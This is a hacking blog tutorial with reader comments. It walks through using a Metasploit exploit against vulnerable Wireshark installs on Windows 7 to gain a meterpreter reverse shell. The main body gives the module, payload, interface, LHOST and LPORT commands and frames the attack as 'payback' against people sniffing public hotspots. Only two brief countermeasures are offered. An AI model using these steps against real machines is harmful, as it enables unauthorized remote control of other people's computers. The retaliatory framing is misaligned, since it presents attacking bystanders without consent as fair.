• 26,952
  • +1,026
  • 3,065
Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit + Backtrack 5 R1

Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit + Backtrack 5 R1

Bookmark

Type : Tutorial

Level : Medium

Victim O.S : Windows 7 SP1 (All Windows is vulnerable)

Vulnerable Application : Wireshark <= 1.4.4

What is Wireshark?

Maybe for people who like to learn about networking & security 95% of them should be know about this tool. According to wikipedia, Wireshark is :

a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

for hacking purpose, this tool usually used to capture the packet (TCP/UDP) that came accross wired network or wireless network.

While I'm in Bandung, Indonesia when connected to a free hotspot service inside a mall or café usually your firewall will show an alert every 5 minutes or less, that's because a lot of some kind of people who want to try scanning or collecting packet and intercepting the network, etc…even once a time I see someone was playing with their Wireshark inside that hotspot.

From my story above, it should be really uncomfortable when you know that someone collecting your data using Wireshark and they hope to get something important data from it.

In this tutorial let's say it was operation payback because attacker trying to collecting our data and we will pwned their computer…fair isn't it? ๐Ÿ™‚

Requirements :

1. Metasploit Framework

2. Operating System (I'm using Backtrack 5 R1 in this tutorial)

Step By Step Hacking Windows 7 SP1 in 5 Steps via Wireshark Using Metasploit:

1. As we know that when you're running Wireshark and collecting data it should not in a short time range (1 or 2 minutes), but when you run this tool you will need to collect as much data as possible. When you want to collect a huge data you also need more time, but when you want to collect only a little data you only need a little time also.

2. In this case we will pwned the attacker who capturing our data using Wireshark that sent across the network. Let's open your metasploit by typing msfconsole and use wireshark_packet_dect exploit.

use exploit/windows/misc/wireshark_packet_dect

set payload windows/meterpreter/reverse_tcp

hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1

3. To view the available options for this exploit, just run show options command from your msf console. In the following picture I'm just set up the important switch that need to set up to perform this attack.

hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1

information :

set interface eth0 --> our network card interface, to know which one you use 
wlan0 or eth0 just run ifconfig from your backtrack console

set lhost 192.168.8.92 --> your local computer use to attack

set lport 443 --> when exploit successfully executed, which port you want
to receive the payload in your local computer

4. Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.

hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1

5. Now run the exploit command.

hacking windows 7 SP1 via wireshark using metasploit + backtrack 5 r1

Pwned!

FYI : this attack doesn't always success 100%, if there's no one using their wireshark to capture data in a network then your exploit will return error message

Countermeasures :

1. Update your Wireshark to the latest version.

2. Use tunneling or encryption to protect your data.

Hope it's useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • puppet

    would u mind if u make a video for this method???

    • v4L

      #puppet
      emm..sorry I still didn’t have time to make it ๐Ÿ˜›

  • puppet

    hahaha…oke…
    let me the make make for you…;)

  • WoW, i never know that wireshark has vurnerabilities… Is there a way to prevent this attack while we are using Wireshark?

    • v4L

      #shunryu
      you can view in countermeasure

  • Oh sorry, i miss that info. Thanks for very fast respond. : )
    So, how can we detect Wireshark Activities (what program that can be used).

    • v4L

      #Shunryu
      Now I’m sorry for late respond ๐Ÿ™‚
      for checking wireshark activities actually you can do with nmap. Next time I’LL write down the tutorial for it…

  • Pingback: How to Detect Someone Sniffing Your Network in a Simple Way | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • thanks for this good article..

  • sheik

    plz how to connect my data card that is unlocked modem in backtrack if u know the method means plz mail me axxosheik@gmail.com

  • dadsa

    can i with that hack wan?

    • v4L

      #dadsa
      I don’t think so.

  • SLam

    Hi all,
    I tried with Backtrack 5 to Win 7 and don`t work by me.

    • v4L

      #SLam
      your win7 need to have a chpset that support promiscious mode to make wireshark capturing the packet

  • vinay sharma

    Hi, i want to install skype in BT5r1, can you help me for that?